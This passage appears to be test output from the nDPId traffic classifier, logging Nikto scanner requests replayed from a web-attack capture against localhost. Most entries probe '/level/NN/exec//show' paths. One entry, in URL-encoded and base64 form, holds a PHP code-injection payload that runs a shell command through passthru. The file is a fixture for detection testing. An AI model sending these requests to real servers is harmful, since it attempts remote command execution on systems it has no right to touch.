{"hostname":"127.0.0.1","url":"127.0.0.1\/level\/90\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001337)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1576420277725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277725,"pkt":"AAAAAAAAAAAAAAAACABFAADI7YBAAEAGTq1\/AAABfwAAAcaYH5AUj9RqmT7XtIAYAED+vAAAAQEICp1m\/wWdZv8FR0VUIC9sZXZlbC85MS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/91\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001338)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1576420277727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277727,"pkt":"AAAAAAAAAAAAAAAACABFAADIYyZAAEAG2Qd\/AAABfwAAAcaaH5DSD1o0DsX43oAYAED+vAAAAQEICp1m\/wadZv8GR0VUIC9sZXZlbC85Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/92\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001339)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1576420277729,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277729,"pkt":"AAAAAAAAAAAAAAAACABFAADIxzpAAEAGdPN\/AAABfwAAAcacH5ALNv4hgWKnmoAYAED+vAAAAQEICp1m\/widZv8IR0VUIC9sZXZlbC85My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/93\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001340)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1576420277730,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277730,"pkt":"AAAAAAAAAAAAAAAACABFAADIHv9AAEAGHS9\/AAABfwAAAcaeH5AL7Sfmt4JqA4AYAED+vAAAAQEICp1m\/wqdZv8KR0VUIC9sZXZlbC85NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDEpDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/94\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001341)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1576420277732,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277732,"pkt":"AAAAAAAAAAAAAAAACABFAADIPWZAAEAG\/sd\/AAABfwAAAcagH5BD6AR+QNLU5oAYAED+vAAAAQEICp1m\/wydZv8MR0VUIC9sZXZlbC85NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/95\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001342)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1576420277734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277734,"pkt":"AAAAAAAAAAAAAAAACABFAADISBNAAEAG9Bp\/AAABfwAAAcaiH5A0bnEJpPWxcYAYAED+vAAAAQEICp1m\/w6dZv8OR0VUIC9sZXZlbC85Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/96\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001343)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1576420277736,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277736,"pkt":"AAAAAAAAAAAAAAAACABFAADIC2JAAEAGMMx\/AAABfwAAAcakH5C2tzJ7p90VYYAYAED+vAAAAQEICp1m\/xCdZv8PR0VUIC9sZXZlbC85Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/97\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001344)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1576420277737,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277737,"pkt":"AAAAAAAAAAAAAAAACABFAADIqydAAEAGkQZ\/AAABfwAAAcamH5BRA5JApfKSEYAYAED+vAAAAQEICp1m\/xGdZv8RR0VUIC9sZXZlbC85OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/98\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001345)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1576420277739,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277739,"pkt":"AAAAAAAAAAAAAAAACABFAADI+OxAAEAGQ0F\/AAABfwAAAcaoH5BlRMHxT\/ad\/4AYAED+vAAAAQEICp1m\/xOdZv8SR0VUIC9sZXZlbC85OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/99\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001346)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1576420277741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277741,"pkt":"AAAAAAAAAAAAAAAACABFAAFdQfFAAEAG+ad\/AAABfwAAAcaqH5DRIHj1tdpDy4AYAED\/UQAAAQEICp1m\/xWdZv8VR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM4OCkNCg0K"}
01211{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001388)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
